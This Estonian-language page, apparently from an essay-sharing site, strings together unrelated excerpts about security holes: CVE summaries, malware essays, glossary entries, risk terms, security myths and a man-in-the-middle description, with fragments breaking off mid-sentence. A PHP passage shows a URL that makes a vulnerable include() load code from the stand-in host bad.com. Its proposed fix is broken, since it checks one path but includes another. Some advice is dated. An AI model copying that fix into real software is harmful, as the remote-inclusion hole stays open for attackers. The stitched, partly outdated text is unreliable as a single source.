Sissejuhatus Käesolevas teemas kirjeldatakse turvaaugu CVE-2006-6512 (WAWI browse() directory traversal). See turvaauk kuulub CGI probleemite hulka ja oli avastatud 10.detsembril 2006 aastal (Luigi Auriemma). Turvaaugule omistati kõrget riskifaktorit. Kirjeldus WAWI (WinAmp Web Inrerface) on Winampi media-mängija plugin (autor on [email protected]), mis võimaldab kaugelt kontrollida Winampi brauseri kaudu. Saab kontrollida mängimist, redigeerida pleilisti, laadida muusikafaile üle ja alla jne. Versioonides <=7.5.13 oli mitu turvaauku. Üks neist on just CVE-2006-6512
Google Chrome enne versiooni 33.0.1750.152 OS X-il ja Linuxil ning enne versiooni 33.0.1750.154 Windowsil. V8 on avatud allikaga JavaScript mootor, mis on kirjutatud keeles C++ ja kasutatakse Google Chrome-is. See kasutab ECMAScripti ja töötab Windows XP-l ja Vistal, Mac OS X 10.5+-il ja Linux süsteemidel, mis kasutavad IA-32, ARM või MIPS protsessoreid. V8 võib töötada iseseisvalt või panna sisse ükskõik millisele C++ rakendusele. Turvaauk CVE-2014-1705 lubab välistel ründajatel lubamatult teavet avaldada, viia sisse modifikatsioone ja põhjustada memory corruption-it, ehk rakenduse jooksutamisel tekib probleem mäluga ja kui rakendus kasutab seda rikutud mälu hiljem võib programm kokku joosta või tekitada muid probleeme. Seda võib ründaja teha, et jooksutada kokku süsteemi, et kasutaja ei saaks midagi teha, näiteks programmi kinni panna ja ründaja pääseks selle abil infoni, mis muidu oleks kaitstud.
Failisüsteemide väär eksport Unixi all jätab failid kaitsetuks; Andmekandja riskantne saatmine; Faksi juriidilise siduvuse ülehindamine; Ühenduse lahutamata jäämine; Krüptomoodulite väär kasutamine; Indeksiandmete halb sünkroniseerimine arhiveerimisel; Andmebaaside sünkroniseerimisviga; Vead mobiilseadmete sünkroniseerimisel; Teadmatus ja motivatsioonitus Turvaauk mitte ainult infotehnika kasutajate, vaid ka näiteks koristajate ja väljastpoolt kutsuvate või saadetud töötajate puhul. Juhendamatuse ja järelevalvetuse korral võivad nende tegutsemisega kaasneda ühenduste lahutamine, koristusveega tekitatud kahjustused, dokumentide või andmekandjate äraviskamine, katsed arvutitel mängida jne. Puuduste seas on muuhulgas järgmised: Andmekandjate ja dokumentide puudulik hävitamine kodutöökohas; Sündmuste väär tõlgendamine;
• 2. kiht on sama, 4. kiht ja edasi ei muutu, oluline muutus headeris • Mitu aadressi hostis • ARP asemel ND protokoll • Interface ID viimasel 64 bitil 26.02 • E – ennetamine, A – avastamine, T – tõrjumine • CERT – computer emergency research • Penetration – nö legaalne häkkimine • Sertifitseerimiskeskus • Sun Tzu ütleb tarku asju • Zero-day – turvaauk, mis ei ole arendajale ega avalikkusele veel teada, kuid häkkeritele võib juba olla. Nimi, sest kui arendaja avastab, on tal 0 päeva aega, et selle vastu midagi ette võtta. • RAT – remote administration tool – keegi, kes kontrollib süsteemi eemalt viisil, nagu tal oleks füüsiline ligipääs süsteemile. Kuigi seda kasutatakse ka legaalselt, siis on see tihti pigem kriminaalne (Trooja hobune näiteks). Saab kontrollida näiteks:
2. Failimahtude suurenemine (eriti täidetavatel). 3. Enneolematute kahtlaste failide ilmumine. 4. Kasutava operatiivmälu vähenemine ( võrreldes tavalise tööreziimiga). 5. Ootamatute video ja heliefektide ilmumine. 6 Kust võite saada arvutiviiruse? Tähelepanu tuvaaukudele Viiruste levikule aitab kaasa ka asjaolu, et süsteemides leitakse vahetevahel vigu, nn turvaauke, mis avalikuks tulles võivad kasutajale kahju teha. Turvaauk on programmi viga, mis avalikuks tulles võib arvutikurjategija pahatahtliku rünnaku vallandada. Nii mõnegi arvutisüsteemi viirusetõrje programm on siis kui suur ja uhke uks keset hõredavõitu seina. Põhjuseks on sagedasti asjaolu, et operatsioonisüsteemide turvaparandused on peale panemata. Windowsi ja internetiühenduse puhul vajutage Start ja valige menüüst Windows Update. Turvapaigad on nn Critical Updates rubriigis ja need on alati paigaldamiseks teisi uuendusi võite valida
Pahavara jaguneb viirusteks, troojalasteks, ussideks, helistajateks, reklaamijateks, makrodeks, tagausteks ja paljudeks muudeks. Mitte segamini ajada tarkvara veaga, ehk turvaauguga, mis võib ka osutuda ohtlikuks(seda võib ära kasutda mitte soovitud isik võib programm ning saada ligipääsu sinu süsteemile). Pahavara kahte rühma Nakkuslik: · Viirused · Ussid Varjatud olekuga(tihti andmepüügiks mõeldud): · Trooja hobused(nimetatakse ka troojalasteks) · Tagauksed · Turvaauk · Nuhkvara · Rootkitid · Keylogerid Viirused on pahavara liik, mis suudab end ise paljundada ning poogivad end teiste failde külge, et teise süsteemi levida ning seda koormata ja seal faile kahjustada. Eksikombel peetakse kõiki pahavara liike viirusteks ning tihti ajatakse teistega segi. Bioloogiliste viirustega sarnanevad nad selle poolest, et võimaldavad oma struktuuri muuta, et pääseda läbi antiviiruste kontrollist.
Viiruseid võivad sisaldada tasuta jagatavad 9 programmid, mängud või ekraanisäästjad. Internetist programme tõmmates tuleks failid enne avamist viirusetõrjeprogrammiga üle vaadata. · Kustuta programmid, mida ei kasutata Arvutis võib olla arvutimüüja poolt eelinstalleeritud tarkvara, mida arvutiomanik ei plaani kunagi kasutada. Selline tarkvara tasub eos arvutist eemaldada. Esiteks võib selles tarkvaras olla mõni turvaauk, teiseks võtab kasutu programm alati enda alla veidi kõvakettapinnast. 10 Kokkuvõte Nüüd kui referaat valmis, loodan et saadakse juba rohkem aru kuidas erinevad viirused levib ning kuidas oma arvutit kaitsta nende eest. Usun et mu referaadist on nii mõnelegi inimesele kasu, et ta saab teada arvutiviirustest ja kõigest sellega seonduvast. Uurimustöö oli huvitav kuna sain ka ennast arendada erinevate teadmiste osas.
failinime taga võib tegelikult peituda viirus. Viiruseid võivad sisaldada tasuta jagatavad programmid, mängud või ekraanisäästjad. Internetist programme tõmmates tuleks failid enne avamist viirusetõrjeprogrammiga üle vaadata. 1. Eemaldada programmid, mida ei kasutata Arvutis võib olla arvutimüüja poolt eelinstalleeritud tarkvara, mida arvutiomanik ei plaani kunagi kasutada. Selline tarkvara tasub eos arvutist eemaldada. Esiteks võib selles tarkvaras olla mõni turvaauk, teiseks võtab kasutu programm alati enda alla veidi kõvakettapinnast. · Mitte jätta disketti arvutisse Disketid on samuti suureks viiruseriski allikaks. Kui kasutate tööks diskette eemaldage need enne arvuti väljalõlitamist. Vastasel korral võib arvuti järgmisel sisselülitamisel püüda operatsioonisüsteemi üles laadida disketilt ja käivitada disketil peituda võiva viiruse. · Mitte jagada diskette Ka hea tuttav võib teadmatusest levitada disketil viirust
81. trooja hobune- ehk troojalane ehk trooja on liik õelvara, mis tavaliselt tuleb kaasa koos mõne teise programmi või failiga. 82. tugikiibistik- täiendav integraalskeemide komplekt, mis seob omavahel erinevad arvuti riistvarakomponendid ja sisaldab vajalikud kontrollerid erinevate sisend- väljundseadmete ühendamiseks nii arvuti sees kasutades siine ja porte kui ka arvutist väljaspool kasutades arvutikorpusele väljatoodud porte. 83. turvaauk- arvutiprogrammi või -süsteemi niisugune omadus, mida selle loomise käigus kas ei mõeldud korralikult läbi, ei osatud ette näha, tehti hooletult või otsustati ignoreerida, ning mille kaudu saab sedasama süsteemi kuritarvitada. 84. tööjaam- tavalisest võimsam lauaarvuti, mis on sageli mõeldud mingi kindla ülesande, näiteks graafikatöötluse, teostamiseks. 85. UPS- puhvertoiteallikas, elektrivõrgu rikete või häirete korral kasutatav varutoiteallikas. 86
kõvaketta täielik kustutus). 1.4.Viiruse levimine ja tegevus 1.3.1.Levimine Arvutiviiruse esmane ülesanne on ennast edasi levitada teistesse arvutitesse. Erinevalt gripiviirusest levivad arvutiviirused igal aastaajal ja igasuguse ilmaga. Nad levivad koos failidega flopiketastel ja CD-del, samuti arvutivõrgu kaudu e-posti teel ning väljajagatud ressursside kaudu, kasutades selleks nn. turvaauke. Turvaauk on programmi viga, mis avalikuks tulles võib arvutikurjategija pahatahtliku rünnaku vallandada. Levivatest viirustest ligi 98% levib e-posti kaudu. Nakatamiskiiruse (aktiivsuse) järgi saab viiruseid klassifitseerida kas aktiivseteks (Fast Infectors) või väheaktiivseteks (Slow Infectors). Aktiivne viirus on viirus, mis olles aktiivselt mälus ei nakata ainult parajasti käivitatavaid faile, vaid ka neid, mis on lihtsalt avatud. Sellise
· Infovaradele (infosüsteemile) mõjuvad ohud (threat) · Ohud võivad ära kasutada süsteemi turvaauke e nõrkusi (vulnerabilities) · Ohud koos nõrkustega määravad ära riski (risk) · Ohu realiseerumisel tekib turvakadu (security loss) · Riski vähendamiseks tuleb turvaauke lappida turvameetmeid (security measures) kasutades 11.Turbemõistete olemus · Oht (threat) potentsiaalne (info)turbe rikkumine · Nõrkus e turvaauk (vulnebarility) infosüsteemi (infovarade) suvaline nõrk koht või turvadefekt · Risk (risk) tõenäosus, et teatud oht kasutab ära infosüsteemi teatud nõrkuse · Turvakadu e turvarike (security loss) sündmus, mille käigus kahjustus infosüsteemi kuuluvate varade turvalisus (käideldavus, terviklus ja/või konfidentsiaalsus)
hädaolukordade lahendamist ning hädaolukorra põhjustatud tagajärgede esmast leevendamist, et taastada elutegevuseks vajalike teenuste kättesaadavus. Kriisireguleerimismeeskond teabevahetuse, ressursside kasutamise ning ametkondade koostöö koordineerimiseks ning olukorra analüüsimiseks moodustatud meeskond, mille koosseis ja töökorraldus ning ettevalmistus võimaldavad ööpäevaringse töö hädaolukorras. Nõrkus e turvaauk infosüsteemi (infovarade) suvaline nõrk koht või turvadefekt. Oht nähtus või sündmus, mis teatud tingimustel võib põhjustada hädaolukorra. 9 Ohuplaan plaan, mille arhiivid, riigi- ja kohaliku omavalitsuse asutused ja avalik- õiguslikud juriidilised isikud ning seaduses või selle alusel sätestatud avalikke
Hacking is cool - kuritegelik Action is better than inaction - liigne agarus on ogarus Educating users solves problem - kindlasti muutub olukord paremaks, aga pahalased on kavalad ning kasutaja ei peagi tingimata midagi valesti tegema We are not a target - kes meid ikka ründab? Botid jms ei pruugi eristada Everyone would be secure if they all just ran Z - nt Win 10 saadab kahtlased failid põhjalikumaks uurimiseks pilve (turvaauk on lahendusse sisseehitatud) We don't need a firewall, we have good host security - kogu võrgu kohta puudub ülevaade, ründaja katsetab igat masinat eraldi We don't need host security, we have a good firewall - end-to-end https põhjustab selle, et selle kaudu liikuva info sisu ei suuda isegi tulemüür näha Let's go production with it now and we can secure it later - kiiresti turule tulemise vajadus
Oletame, et meie programm laadib PHP skripte vastavalt sellele, mis on $_GET parameetri X väärtus: include_once($_GET['X'].'.php'); http://www.example.com/index.php?X=product_details - laaditakse faili product_details.php http://www.example.com/index.php?X=products_list - laaditakse faili products_list.php http://www.example.com/index.php?X=http://www.bad.com/hack - laaditakse faili hack.php domeenist bad.com Viimase punkti käitumine ei ole soovituslik ning on tõsine turvaauk ja kes teab mis hack.php sees võib olla ja mis tagajärjed selle käivitamisega kaasnevad. Turvaaugu vältimiseks on mitu võimalust. Üks on kontrollida, kas fail, mida tuleb laadida asub eelnevalt defineeritud kataloogis ja laadida seda ainult positiivse vastuse juhul. $includesPath = 'includes/products/'; ... ... ... if (file_exists($includesPath.$_GET['X'].'.php')) { include_once($_GET['X'].'.php'); }
teine kasutaja saab teada, et teine kasutaja on selle ära krüpeerinud eeldusel, et need võtmed on hoitud saladuses. Avaliku võtme krüptograafia Esimene kasutaja saadab genereeritud arvu ja teine kasutaja krüpeerib selle ära oma salajase võtmega ehk allkirjastab selle. Selleks, et seda kätte saada, peab esimene kasutaja küsima teise käest tema avalikku võtit ja saades kätte teise kasutaja avaliku võtme, dekrüpeeritakse see arv ära. Selle puhul on olemas ka turvaauk ehk kui keegi on andmevahetuse keskel (man in the middle attack). Kui esimene kasutaja saadab kirja edasi ja teine kasutaja saadab juhuslikult genereeritud arvu, siis kolmas osapool krüpeerib selle ära oma salajase võtmega. Kui teine kasutaja küsib esimese käest avalikku võtit, siis hoopis kolmas osapool saadab oma avaliku võtme. Kolmas osapool saadab selle ja esimene krüpteerib selle ära oma salajase võtmega. Kolmas osapool küsib esimese käest tema avalikku võtit ja saab selle
annaabi.ee 
